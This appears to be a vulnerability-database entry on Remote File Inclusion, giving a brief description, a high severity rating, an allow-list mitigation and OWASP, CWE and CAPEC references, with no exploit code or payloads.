Vulnerabilities/

Remote File Inclusion

Severity:: High

Description

Remote File Inclusion (RFI) is a vulnerability that allows attackers to include remote files, exploiting dynamic file inclusion mechanisms in the target application. This occurs due to the use of user-supplied input without proper validation. Attackers can execute arbitrary code on the server, leading to Server-Side Request Forgery (SSRF) issues.

Recommendation

To mitigate RFI vulnerabilities, avoid passing user-submitted input to filesystem/framework APIs. If unavoidable, maintain an allow list of files that may be included, using an identifier to access selected files. Reject any request with an invalid identifier to eliminate attack surface.

References

OWASP: Testing for Remote File Inclusion
Wikipedia: File inclusion vulnerability
CWE-20
CWE-918
CWE-98
CAPEC-193
OWASP 2021-A10
OWASP 2021-A3

Related Issues

Remote File Disclosure - Vulnerability
Remote URL Inclusion - Vulnerability
Local File Inclusion - Vulnerability
WordPress Plugin File Groups 1.1.2 SQLI - Vulnerability

Tags:: File Inclusion; SSRF; Injection

Anything's wrong? Let us know Last updated on May 13, 2024